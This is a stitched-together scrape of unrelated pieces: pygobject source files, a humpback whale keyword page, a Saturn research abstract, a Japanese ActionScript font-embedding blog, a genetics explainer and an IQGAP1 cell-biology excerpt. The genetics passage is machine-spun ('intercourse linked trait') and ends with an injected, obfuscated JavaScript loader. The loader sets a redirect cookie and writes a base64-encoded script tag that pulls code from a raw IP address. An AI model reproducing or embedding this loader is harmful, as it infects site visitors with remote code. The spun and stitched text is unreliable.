Fifth Floor, Boston, MA 02110-1301 * USA */ #include "pygi-private.h" #include <pygobject.h> static PyObject * _wrap_pyg_enum_add (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:enum_add", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (g_type == G_TYPE_INVALID) { return NULL; } return pyg_enum_add(NULL, g_type_name(g_type), NULL, g_type); } static PyObject * _wrap_pyg_flags_add (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:flags_add", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (g_type == G_TYPE_INVALID) { return NULL; } return pyg_flags_add(NULL, g_type_name(g_type), NULL, g_type); } static PyObject * _wrap_pyg_set_object_has_new_constructor (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:set_object_has_new_constructor", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (!g_type_is_a(g_type, G_TYPE_OBJECT)) { PyErr_SetString(PyExc_TypeError, "must be a subtype of GObject"); return NULL; } pyg_set_object_has_new_constructor(g_type); Py_RETURN_NONE; } static PyMethodDef _pygi_functions[] = { { "enum_add", (PyCFunction)_wrap_pyg_enum_add, METH_VARARGS | METH_KEYWORDS }, { "flags_add", (PyCFunction)_wrap_pyg_flags_add, METH_VARARGS | METH_KEYWORDS }, { "set_object_has_new_constructor", (PyCFunction)_wrap_pyg_set_object_has_new_constructor, METH_VARARGS | METH_KEYWORDS }, { NULL, NULL, 0 } }; struct PyGI_API PyGI_API = { pygi_type_import_by_g_type }; PyMODINIT_FUNC init_gi(void) { PyObject *m; PyObject *api; m = Py_InitModule("_gi", _pygi_functions); if (m == NULL) { return; } if (pygobject_init(-1, -1, -1) == NULL) { return; } if (_pygobject_import() < 0) { return; } _pygi_repository_register_types(m); _pygi_info_register_types(m); _pygi_struct_register_types(m); _pygi_argument_init(); api = PyCObject_FromVoidPtr((void *)&PyGI_API, NULL); if (api == NULL) { return; } PyModule_AddObject(m, "_API", api); } # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2005-2009 Johan Dahlin <[email protected]> # # importer.py: dynamic importer for introspected libraries. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import import sys import gobject from ._gi import Repository, RepositoryError from .module import DynamicModule repository = Repository.get_default() class DynamicImporter(object): # Note: see PEP302 for the Importer Protocol implemented below. def __init__(self, path): self.path = path def find_module(self, fullname, path=None): if not fullname.startswith(self.path): return path, namespace = fullname.rsplit('.', 1) if path != self.path: return try: repository.require(namespace) except RepositoryError: pass else: return self def load_module(self, fullname): if fullname in sys.modules: return sys.modules[name] path, namespace = fullname.rsplit('.', 1) # Workaround for GObject if namespace == 'GObject': sys.modules[fullname] = gobject return gobject # Look for an overrides module overrides_name = 'gi.overrides.%s' % namespace try: overrides_type_name = '%sModule' % namespace overrides_module = __import__(overrides_name, fromlist=[overrides_type_name]) module_type = getattr(overrides_module, overrides_type_name) except ImportError, e: module_type = DynamicModule module = module_type.__new__(module_type) module.__dict__ = { '__file__': '<%s>' % fullname, '__name__': fullname, '__namespace__': namespace, '__loader__': self } sys.modules[fullname] = module module.__init__() return module # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2007-2009 Johan Dahlin <[email protected]> # # module.py: dynamic module for introspected libraries. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import import os import gobject from ._gi import \ Repository, \ FunctionInfo, \ RegisteredTypeInfo, \ EnumInfo, \ ObjectInfo, \ InterfaceInfo, \ ConstantInfo, \ StructInfo, \ Struct, \ enum_add, \ flags_add from .types import \ GObjectMeta, \ StructMeta, \ Boxed, \ Function repository = Repository.get_default() def get_parent_for_object(object_info): parent_object_info = object_info.get_parent() if not parent_object_info: return object namespace = parent_object_info.get_namespace() name = parent_object_info.get_name() # Workaround for GObject.Object and GObject.InitiallyUnowned. if namespace == 'GObject' and name == 'Object' or name == 'InitiallyUnowned': return gobject.GObject
__label__pos
0.936129
KeyWEn.com         Humpbacks       Article     History   Tree Map   Encyclopedia of Keywords > Life > Animals > Specific Animals > Whales > Humpbacks   Michael Charnine Keywords and Sections RORQUALS HUMPBACKS TRAVEL HUMPBACKS LIVE ADULT HUMPBACKS FEMALE HUMPBACKS SEALS BREEDING BAN NORTHERN HEMISPHERE CATCH SOUTHEAST ALASKA ALASKA FISHES SHARKS SOUTH PACIFIC CARIBBEAN WEST INDIES SCIENTISTS HUMPBACKS FEED PLANKTON SONG SONGS WHITE-SIDED DOLPHINS PODS BUBBLES MOUTHS HUNTING SUMMER MONTHS WINTER ENDANGERED ENDANGERED SPECIES GRAY WHALES KILLER WHALES DIVE SPERM WHALES RIGHT WHALES BLUE WHALE BLUE WHALES MIGRATING SUMMER LATE SPRING ESTIMATED WORLD POPULATION TROPICAL WATERS SOUTHERN JAPAN WHALE WATCHING TOURS Review of Short Phrases and Links     This Review contains major "Humpbacks"- related terms, short phrases and links grouped together in the form of Encyclopedia article. Definitions 1. Humpbacks are known as the acrobats of the ocean, often seen breaching (jumping out of the water), and flipper and tail slapping. (Web site) 2. Humpbacks are migratory, spending summers in cooler, high-latitude waters and mating and calving in tropical and subtropical waters. 3. Humpbacks are also described as rorquals, a family that includes the blue, fin, sei and minke whales. (Web site) 4. Humpbacks are mainly black or grey with white undersides to their flukes, flippers and bellies. (Web site) 5. Humpbacks are a type of baleen whale, the largest of all whales, a group including blue, fin and minke whales. Rorquals 1. Humpbacks are also rorquals, whales which have distinctive throat grooves. (Web site) 2. Like all rorquals, humpbacks are baleen whales. (Web site) Humpbacks Travel 1. Behaviour: Humpbacks travel in groups known as pods. Humpbacks Live 1. Complex habitat In the complex underwater habitats where humpbacks live, figuring out where other whales are, just by listening, can prove quite challenging. Adult Humpbacks 1. Adult humpbacks vary in length from 40-50 feet, the females being slightly longer than the males, and weigh up to 55 tons. (Web site) 2. It is estimated that adult humpbacks eat 1360 kg (2998 lb) of food each day. Female Humpbacks 1. Although both male and female Humpbacks are capable of song, the male is the main singer of the family. (Web site) Seals 1. This will be bad news for the humpbacks and minkes, as well as penguins, seals, and other predators that compete for these nourishing little morsels. (Web site) Breeding 1. But listen up, it's while breeding that male humpbacks "sing" their eerie wail. (Web site) Ban 1. The former Soviet Union also hunted humpbacks until 1973 in defiance of the ban, though it is disputed how many they killed. (Web site) 2. By 1968, when a ban was finally placed on hunting them, only about 1,000 humpbacks remained. Northern Hemisphere 1. Humpbacks from the Southern Hemisphere are larger on average than those in the Northern Hemisphere. Catch 1. A method known as bubble net feeding allows the humpbacks to catch a huge amount of tiny fish when feeding. (Web site) 2. Four species of rorquals as well as humpbacks are hunted; and during a portion of the season in 1903 the catch included 174 of the former and 14. Southeast Alaska 1. The humpbacks of southeast Alaska are known to migrate thousands of miles to Hawaii to mate, where they sing long and complex songs. Alaska 1. July through November, humpbacks may be spotted playing off central California, Alaska and the shores of Baja California. (Web site) Fishes 1. Because of this, humpbacks are classified as "swallowers" and not "skimmers." They do eat commercially exploited fishes. (Web site) Sharks 1. If the humpbacks are scared away from the shallow waters where they nurse their young, they are in danger from sharks. (Web site) South Pacific 1. The fleet is conducting its largest hunt in the South Pacific - it has instructions to kill up to 1,000 whales, including 50 humpbacks. (Web site) 2. While many of the humpbacks sing head down to Hawaii, it's the opposite in the South Pacific. (Web site) Caribbean 1. The humpbacks we see in our area spend the winter months in the Caribbean, an area that serves as their breeding and calving grounds. 2. Humpbacks arrive from the Caribbean in the early spring to feed on the south coast in the Hermitage and Placentia Bays. West Indies 1. Humpbacks have been extensively studied in their warm water breeding areas, particularly the West Indies, Bermuda, and Hawaii. (Web site) Scientists 1. But observations so far haven’t helped scientists understand whether humpbacks use songs the way birds do. 2. Washington, June 8 (ANI): Scientists have discovered that female humpbacks, especially of the same age, form bonds that last year after year. (Web site) Humpbacks Feed 1. Humpbacks feed heavily because, unlike most birds and mammals, they do not feed year round. 2. The rich waters attract many forms of fish and shrimp which the humpbacks feed on. 3. Humpbacks feed heavily in Glacier Bay because they do not feed year round. (Web site) Plankton 1. Humpbacks feed upon plankton, the plant and animal life at the surface of the ocean's water, or upon fish in large patches or schools. (Web site) Song 1. Cholewiak noticed two changes in song when humpbacks sang together. 2. Humpbacks often feed in large groups and are famous for their "song". (Web site) 3. It is the baleen whales, especially the humpbacks, which break into song. (Web site) Songs 1. Several variations of these songs are started at the beginning of the season, then eventually all humpbacks are singing the same song for that year. 2. We know, for instance, that while both male and female humpbacks can produce sounds, only males appear to sing songs with distinct themes and melodies. (Web site) 3. The "songs" of humpbacks are made up of complex vocal patterns. (Web site) White-Sided Dolphins 1. In June, the humpbacks begin to return; by late June they are abundant, and white-sided dolphins are often seen. (Web site) Pods 1. Humpbacks are very social whales, often traveling or hunting in pods of 200 or more individuals, though they are more spread out during their migrations. 2. Humpbacks can communicate with each other over great distances under water and travel in groups called pods. 3. Humpbacks swim in pods of three or four as they migrate. (Web site) Bubbles 1. The humpbacks manage to corral fish inside a cylindrical column of bubbles released through the whales' blowholes. (Web site) 2. Several humpbacks will join forces to compress a school of fish by blowing streams of bubbles around the school's periphery. (Web site) 3. This technique can involve a ring of bubbles up to 100 feet in diameter and the cooperation of a dozen Humpbacks. (Web site) Mouths 1. Unlike orca, which are odontocetes or toothed whales, humpbacks are mysticetes, harmless leviathans with only baleen plates in their mouths. 2. Humpbacks are baleen whales, which means that they have bristle like plates in their mouths to obtain nourishment. 3. Researchers don’t really know how the sounds are produced since Humpbacks don’t have vocal chords, and their mouths don’t move as they sing. Hunting 1. During the 1980's, the inhabitants of western Greenland were still hunting humpbacks, but they were limited to 10 whales per year. 2. In the late 1870s schooners began hunting humpbacks in the Gulf of Maine. (Web site) 3. Later, the Whaling Commission issued a ban on hunting humpbacks in 1966. (Web site) Summer Months 1. Humpbacks are seasonal feeders during the summer months in Antarctica, consuming as much as 2500 kg of krill, plankton or small fish daily. Winter 1. Anecdotal evidence from fishermen and other boaters, Straley said, indicated more humpbacks were using Prince William Sound in winter. (Web site) 2. During the winter most of the humpbacks migrate to the Caribbean where they mate and give birth to their young. (Web site) 3. The Hawaiian Islands are one of the world's most important whale habitats, hosting thousands of humpbacks (Megaptera novaeangliae) each winter. (Web site) Endangered 1. An international ban on commercial whaling was instituted in 1964, but humpbacks are still endangered. (Web site) Endangered Species 1. In spite of their recent strides towards recovery, humpbacks continue to be designated as an endangered species. Gray Whales 1. They communicate with each other by producing a great variety of sounds, from the moans and knocks of gray whales to the eerie songs of humpbacks. (Web site) Killer Whales 1. This is your opportunity to see Humpbacks, Orcas (Killer Whales), Minkes, Fins as well as the mighty Blue Whale, the largest animal to inhabit the earth. 2. The most common whales you are likely to see in Alaska are orcas, or killer whales and humpbacks. Dive 1. When bubble-net feeding, a pod of humpbacks dive to depths of 50 ft (15 m) and form a large circle. (Web site) 2. Humpbacks are also the whales who show off big fan tails when they dive. 3. Humpbacks can dive for up to 30 minutes and reach depths of 500-700 feet. Sperm Whales 1. And finback, humpbacks and sperm whales are a common sight in northwest Mexico's Sea of Cortez. (Web site) 2. But individual humpbacks appear to always play the some position in a hunting team, unlike the rotation of tasks apparent in sperm whales. (Web site) Right Whales 1. Humpbacks, along with the bowhead, blue and right whales, are some of the most endangered species on the earth. (Web site) Blue Whale 1. Humpbacks belong to a group of whales called rorquals, that includes the fin whale and the blue whale, the largest animal that has ever lived. (Web site) 2. Blue whale calls were detected on all but two of 76 dives, and humpbacks were detected on 20% of dives. (Web site) Blue Whales 1. Baleen whales include humpbacks, blue whales, and gray whales. (Web site) 2. The plates are black and measure up to a metre long in Blue whales (80 cm in Humpbacks). (Web site) 3. Like the Humpbacks, Blue Whales often shift to various feeding locations off central California in search of krill concentrations. (Web site) Migrating 1. The Indian Ocean has a northern coastline, while the Atlantic and Pacific oceans do not, thereby preventing the humpbacks from migrating to the pole. (Web site) Summer 1. In spring, summer, and fall at the Farallon Islands off San Francisco, Monterey Bay, one may see humpbacks, greys, and blue whales. 2. In the summer, humpbacks are found in high latitude feeding grounds such as the Gulf of Maine in the Atlantic and Gulf of Alaska in the Pacific. (Web site) 3. Humpbacks are the first baleen #whales shown to form lasting bonds, with female friends reuniting each summer. (Web site) Late Spring 1. After traveling up from the Caribbean, humpbacks in our area stay in the Gulf of Maine from late spring to early fall feeding. Estimated 1. It is estimated that during the 20th century at least 200,000 Humpbacks were taken, reducing the global population by over 90%. (Web site) 2. There are now an estimated 18,000 to 20,000 humpbacks in the North Pacific, up from just 1,400 in the mid-1960s. 3. It is estimated that whaling took 250,000 humpbacks. (Web site) World Population 1. During the first three-quarters of the 20th century, at least 200,000 humpbacks were killed, slashing the world population by 90 per cent. Tropical Waters 1. Humpbacks spend the summer months in the polar waters, and then follow specific migratory routes to the tropical waters to wait out the winter. (Web site) Southern Japan 1. These include humpbacks that spend the winter in tropical waters off southern Japan and the Philippines and the summer near Russia's Far East coast. (Web site) Whale Watching Tours 1. Humpbacks are among the most spotted species during whale watching tours all around the country. (Web site) 2. Whale Watching Tours have the opportunity to view the Humpbacks in the summer months only. (Web site) Categories 1. Life > Animals > Specific Animals > Whales 2. Feeding 3. Flippers 4. Orcas 5. Fins Related Keywords * Australian Waters * Backs * Baleen Whales * Blubber * Breach * Breaching * Breeding Grounds * Brink * Bubble Net * Bubble Nets * Bushy Blow * Calf * Calves * Calving * Cetaceans * Chins * Diverse Repertoire * Dolphins * Dorsal Fin * Entangled * Feed * Feeding * Feeding Ground * Feeding Grounds * Females * Fin * Finbacks * Fins * Fin Whales * Fish * Flipper * Flippers * Flukes * Gray * Grays * Hawaii * Herring * Icy Waters * Krill * Lunging * Males * Male Humpbacks * Mate * Mates * Mating * Migratory * Minke * Minkes * Minke Whales * North Atlantic * North Pacific * Ocean * Oceans * Orcas * Populations * Prey * Scientists Estimate * Slap * Slow Swimmers * Southern Hemisphere * Southern Right Whale * Southern Right Whales * Species * Surface * Tail * Tails * Tail Slapping * Third Class * Throat * Throat Grooves * Ton * Tons * Tubercles * Underside * Water * Waters * Whale * Whales * Whale Watchers * Whaling * Winter Months * Works Similarly 1. Books about "Humpbacks" in Amazon.com Book: Keywen Category Structure   Short phrases about "Humpbacks"   Originally created: April 04, 2011.   Links checked: July 23, 2013.   Please send us comments and questions by this Online Form   Please click on Move Up to move good phrases up. 0.0209 sec. a=1..
__label__pos
0.991811
Rotationally driven magnetic reconnection in Saturn’s dayside Ruilong Guo, Zhonghua Yao, Y. Wei, Licia Ray, Jonathan Rae, Chris Arridge, Andrew Coates, Peter Delamere, N. Sergis, P. Kollman, Denis Grodent, William Dunn, J. H. Waite, J. L. Burch, Z. Y. Pu, B. Palmaerts, Michelle Dougherty Research output: Contribution to journalArticlepeer-review 26 Citations (Scopus) Abstract Magnetic reconnection is a key process that explosively accelerates charged particles, generating phenomena such as nebular flares, solar flares and stunning aurorae. In planetary magnetospheres, magnetic reconnection has often been identified on the dayside magnetopause and in the nightside magnetodisc, where thin-current-sheet conditions are conducive to reconnection. The dayside magnetodisc is usually considered thicker than the nightside due to the compression of solar wind, and is therefore not an ideal environment for reconnection. In contrast, a recent statistical study of magnetic flux circulation strongly suggests that magnetic reconnection must occur throughout Saturn’s dayside magnetosphere. Additionally, the source of energetic plasma can be present in the noon sector of giant planetary magnetospheres. However, so far, dayside magnetic reconnection has only been identified at the magnetopause. Here, we report direct evidence of near-noon reconnection within Saturn’s magnetodisc using measurements from the Cassini spacecraft. The measured energetic electrons and ions (ranging from tens to hundreds of keV) and the estimated energy flux of ~2.6 mW m–2 within the reconnection region are sufficient to power aurorae. We suggest that dayside magnetodisc reconnection can explain bursty phenomena in the dayside magnetospheres of giant planets, which can potentially advance our understanding of quasi-periodic injections of relativistic electrons and auroral pulsations. Original languageEnglish Pages (from-to)640-645 Number of pages6 JournalNature Astronomy Volume2 Issue number8 Early online date4 Jun 2018 DOIs Publication statusPublished - Aug 2018 Externally publishedYes Fingerprint Dive into the research topics of 'Rotationally driven magnetic reconnection in Saturn’s dayside'. Together they form a unique fingerprint. Cite this
__label__pos
0.738182
[AS3] FlexSDK3とFlexSDK4でのFont Embed, TextFieldとTextLayoutFramework 2011/07/10 埋め込み方法の違いなどのまとめ ■FlexSDK 3.x とFlex SDK 4.x Flex SDK 3.x >> Minimum Player version 9.0.124 Flex SDK 4.x >> Minimum Player version 10.0 4.5は10.2からになってた ■TextFieldとText Layout Framework TextField Text Layout Framework データが軽くてすむ。 普通のやり方だと動的に縦組ができない。 (静止テキストは可能) 取り扱いが楽。 Player 9.0 higher フォントの埋め込みは非CFF データが若干重い。 縦組ができる。 取り扱いが面倒。 Player 10.0 higher。 フォントの埋め込みは要 CFF CFFとはCompact Font Formatのことで、従来の埋め込み方法よりもデータが軽くなるとか。 >> Compact Font Format Text Layout Framework (TFL)については、 >> http://labs.adobe.com/technologies/textlayout/ 上のページからリンクされているPDFを読むと、どんなもんで、どんなことがやれることがわかってよいです。 Text Layout Framework Overview(pdf) そんで、さきほどのPDFと下記ページにあるDownload examples.を落としてきてやり方をみると、 かなりできるようになるのではないかと。 Text Layout Framework(Adobe Open Source) フォントの埋め込み方法については >> Embedded fonts and the Text Layout Framework 縦書き方法は「にゃあプロジェクト」さんに書いてありました。どうもです。 [TLF] TextLayoutFrameworkだ! (1) Flex SDK 3.x での埋め込み。TextFieldよう package { import flash.display.Sprite; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.text.TextFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK3Test extends Sprite { [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontName='MyFutogo', fontWeight="Bold", mimeType='application/x-font' )] private var _myFontClass:Class; public function SDK3Test() { var textfield:TextField = new TextField(); var textFormat:TextFormat = new TextFormat(); textFormat.font = "MyFutogo"; textFormat.size = 21; textfield.autoSize = TextFieldAutoSize.LEFT; textfield.defaultTextFormat = textFormat; textfield.text = "Hello embed font!"; textfield.embedFonts = true; addChild(textfield); textfield.x = 30; textfield.y = 30; } } } EmbedのところがfontName, fontWeightを指定するところに注目 SDK 4.x でフォント埋め込みTextFieldよう package { import flash.display.Sprite; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.text.TextFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK4Test extends Sprite { //Unicode Range Basic Latin [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontFamily = "MyFutogo", embedAsCFF = "false", unicodeRange = "U+0020-002F,U+0030-0039,U+003A-0040,U+0041-005A,U+005B-0060,U+0061-007A,U+007B-007E", mimeType='application/x-font' )] private var _myFontClass:Class; public function SDK4Test() { var textfield:TextField = new TextField(); var textFormat:TextFormat = new TextFormat(); textFormat.font = "MyFutogo"; textFormat.size = 21; textfield.autoSize = TextFieldAutoSize.LEFT; textfield.defaultTextFormat = textFormat; textfield.embedFonts = true; textfield.text = "Hello embed font!"; addChild(textfield); textfield.x = 30; textfield.y = 30; } } } fontName→fontFamilyに変更。fontWeightがなし。 embedAsCFFを追加してfalseに。 unicodeRangeを指定可能 SDK 4.x でフォント埋め込みTLFよう package { import flash.display.Sprite; import flash.geom.Rectangle; import flash.text.engine.FontLookup; import flash.text.engine.RenderingMode; import flash.text.engine.TextLine; import flashx.textLayout.factory.StringTextLineFactory; import flashx.textLayout.formats.TextLayoutFormat; [SWF(width="400", height="400",frameRate="30",backgroundColor="0xffffff")] public class SDK4CFF extends Sprite { //Unicode Range Basic Latin [Embed(source='A-OTF-FutoGoB101Pro-Bold.otf', fontFamily = "MyFutogo", embedAsCFF = "true", unicodeRange = "U+0020-002F,U+0030-0039,U+003A-0040,U+0041-005A,U+005B-0060,U+0061-007A,U+007B-007E", mimeType='application/x-font' )] private var _myFontClass:Class; public function SDK4CFF() { var cf:TextLayoutFormat = new TextLayoutFormat(); cf.fontSize = 21; cf.fontFamily = "MyFutogo"; cf.fontLookup = FontLookup.EMBEDDED_CFF; cf.renderingMode = RenderingMode.CFF; var factory:StringTextLineFactory = new StringTextLineFactory(); factory.text = "Hello embed font!"; factory.compositionBounds = new Rectangle(30, 30, 200, 50); factory.spanFormat = cf; factory.textFlowFormat = cf; factory.createTextLines(onTextLineCreated); } private function onTextLineCreated(tl:TextLine):void { addChild(tl); } } } embedAsCFFをtrueにする。 と、これでFlexでフォントを埋め込む方法がわかってよかった。 LINEで送る Pocket 自作iPhoneアプリ 好評発売中! フォルメモ - シンプルなフォルダつきメモ帳 ジッピー電卓 - 消費税や割引もサクサク計算! ページトップへ戻る
__label__pos
0.880902
What exactly is an intercourse linked trait – The sex chromosomes are one set What exactly is an intercourse linked trait – The sex chromosomes are one set In humans, along with in a great many other pets plus some flowers, the intercourse regarding the person is dependent upon intercourse chromosomes. The intercourse chromosomes are one set of non-homologous chromosomes. As yet, we now have just considered inheritance habits among non-sex chromosomes, or autosomes. As well as 22 homologous pairs of autosomes, individual females have homologous couple of X chromosomes, whereas peoples men have actually an XY chromosome set. The Y chromosome is much shorter and contains many fewer genes although the Y chromosome contains a small region of similarity to the X chromosome so that they can pair during meiosis. Each time a gene being examined occurs on the X chromosome, although not regarding the Y chromosome, it is known to be X-linked. Figure 1. In Drosophila, the gene for attention color is found in the X chromosome. Clockwise from top left are brown, cinnabar, sepia, vermilion, white, and red. Red attention color is wild-type and it is principal to eye color that is white. Eye color in Drosophila had been one of the primary traits that are x-linked be identified. Thomas search Morgan mapped this trait to your X chromosome in 1910. Like people, Drosophila men have actually an XY chromosome set, and females are XX. In flies, the wild-type eye color is red (X W ) which is principal to white attention color (X w ) (Figure 1). Due to the located area of the eye-color gene, reciprocal crosses usually do not produce the exact same offspring ratios. Men are reported to be hemizygous, simply because they have just one allele for almost any X-linked attribute. Hemizygosity helps make the information of recessiveness and dominance unimportant for XY men. Drosophila men lack a 2nd copy that is allele the Y chromosome; that is, their genotype can only just be X W Y or X w Y. in comparison, females have actually two allele copies of the gene and may be X W X W , X W X w , or X w X w . Within an X-linked cross, the genotypes of F1 and F2 offspring depend on whether the recessive trait ended up being expressed by the male or perhaps the feminine within the P0 generation. Pertaining to Drosophila attention color, if the P0 male expresses the white-eye phenotype and the feminine is homozygous red-eyed, all people in the F1 generation exhibit red eyes. The F1 females are heterozygous (X W X w ), therefore the men are typical X W Y, having received their X chromosome from the homozygous dominant P0 female and their Y chromosome from the P0 male. a cross that is subsequent the X W X w feminine while the X W Y male would create just red-eyed females (with X W X W or X W X w genotypes) and both red- and white-eyed men (with X W Y or X w Y genotypes). Now, think about a cross from a homozygous female that is white-eyed a male with red eyes (Figure 2). The F1 generation would show just heterozygous red-eyed females (X W X w ) and just white-eyed males (X w Y). 1 / 2 of the F2 females is red-eyed (X W X w ) and half is white-eyed (X w X w ). the russian bride kristina pimenova Similarly, 50 % of the F2 males could be red-eyed (X W Y) and half is white-eyed (X w Y). Figure 2. Punnett square analysis can be used to look for the ratio of offspring from a cross between a red-eyed male good fresh good fresh fruit fly and a white-eyed fruit fly that is female. Exactly just What ratio of offspring would derive from a cross from a white-eyed male and a female that is heterozygous for red attention color? Discoveries in good fresh fresh fruit fly genetics could be put on genetics that are human. Whenever a parent that is female homozygous for a recessive X-linked trait, she’ll pass the trait on to 100 % of her offspring. Her male offspring are, consequently, destined to convey the trait, because they will inherit their father’s Y chromosome. In people, the alleles for many conditions (some types of color loss of sight, hemophilia, and dystrophy that is muscular are X-linked. Females that are heterozygous of these conditions are reported to be providers and might perhaps perhaps not display any effects that are phenotypic. These females will pass the illness to 50 % of their sons and certainly will pass provider status to 50 % of their daughters; consequently, recessive traits that are x-linked more often in men than females. The gender with the non-homologous sex chromosomes is the female rather than the male in some groups of organisms with sex chromosomes. This is actually the instance for many birds. In this instance, sex-linked faculties may well be more more likely to can be found in the feminine, by which they’ve been hemizygous. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
__label__pos
0.744565
Journal of Cell Science partnership with Dryad Journal of Cell Science makes data accessibility easy with Dryad Summary IQGAP1 has been implicated as a regulator of cell motility because its overexpression or underexpression stimulates or inhibits cell migration, respectively, but the underlying mechanisms are not well understood. Here, we present evidence that IQGAP1 stimulates branched actin filament assembly, which provides the force for lamellipodial protrusion, and that this function of IQGAP1 is regulated by binding of type 2 fibroblast growth factor (FGF2) to a cognate receptor, FGFR1. Stimulation of serum-starved MDBK cells with FGF2 promoted IQGAP1-dependent lamellipodial protrusion and cell migration, and intracellular associations of IQGAP1 with FGFR1 – and two other factors – the Arp2/3 complex and its activator N-WASP, that coordinately promote nucleation of branched actin filament networks. FGF2 also induced recruitment of IQGAP1, FGFR1, N-WASP and Arp2/3 complex to lamellipodia. N-WASP was also required for FGF2-stimulated migration of MDBK cells. In vitro, IQGAP1 bound directly to the cytoplasmic tail of FGFR1 and to N-WASP, and stimulated branched actin filament nucleation in the presence of N-WASP and the Arp2/3 complex. Based on these observations, we conclude that IQGAP1 links FGF2 signaling to Arp2/3 complex-dependent actin assembly by serving as a binding partner for FGFR1 and as an activator of N-WASP. Introduction IQGAP1 (Weissbach et al., 1998) is an ∼380 kDa homodimeric protein (Bashour et al., 1997) that is widely expressed among vertebrate cell types from early embryogenesis (Cupit et al., 2004; Yamashiro et al., 2003) through adulthood (Bashour et al., 1997; Takemoto et al., 2001; Yamaoka-Tojo et al., 2004; Zhou et al., 2003). Several sequentially arranged functional domains enable IQGAP1 to bind directly to a rich spectrum of cytoskeletal, adhesion and regulatory proteins (Briggs and Sacks, 2003; Mateer and Bloom, 2003), including F-actin (Bashour et al., 1997; Fukata et al., 1997), the microtubule plus end capping protein, CLIP-170 (Fukata et al., 2002), E-cadherin (Kuroda et al., 1998), β-catenin (Kuroda et al., 1998), activated forms of the small G proteins, Cdc42 and Rac1 (Hart et al., 1996; Kuroda et al., 1996), calmodulin (Mateer et al., 2002), MAP kinases (Roy et al., 2004; Roy et al., 2005), the tumor suppressor protein, APC (Watanabe et al., 2004), and VEGFR2, the type 2 receptor for vascular endothelial growth factor, or VEGF (Yamaoka-Tojo et al., 2004). Like many of its associating proteins, IQGAP1 preferentially accumulates in the cell cortex, where it is most concentrated at actin filament-rich sites, such as lamellipodia and cell-cell junctions (Bashour et al., 1997; Hart et al., 1996; Kuroda et al., 1998; Yamashiro et al., 2003). Regulation of cell motility and morphogenesis are among the most conspicuous cell biological functions of IQGAP1. The principal evidence for this conclusion is that siRNA-mediated knockdown of IQGAP1 potently inhibited cell motility (Mataraza et al., 2003; Yamaoka-Tojo et al., 2004), whereas cell migration (Mataraza et al., 2003) and neurite outgrowth (Li et al., 2005) were enhanced in cells overexpressing IQGAP1. Regulation of cell motility upstream of IQGAP1 has not been widely explored, but IQGAP1-dependent motility of endothelial cells was found to be triggered by binding of VEGF to VEGFR2, and subsequent recruitment of IQGAP1 to the cytoplasmic tail of VEGFR2 (Yamaoka-Tojo et al., 2004). Binding of a specific extracellular ligand to its cognate cell surface receptor thus represents at least one mechanism by which IQGAP1 can promote cell motility. Knowledge of the downstream pathways by which IQGAP1 regulates cell motility has remained equally limited. One possible mechanism involves IQGAP1-dependent regulation of intercellular adhesion. IQGAP1 has been reported to inhibit cell-cell adhesion by binding to E-cadherin and β-catenin, thereby blocking interaction of β-catenin with α-catenin and uncoupling the adhesion machinery from the actin cystoskelelon (Kuroda et al., 1998). This inhibition of cell-cell adhesion by 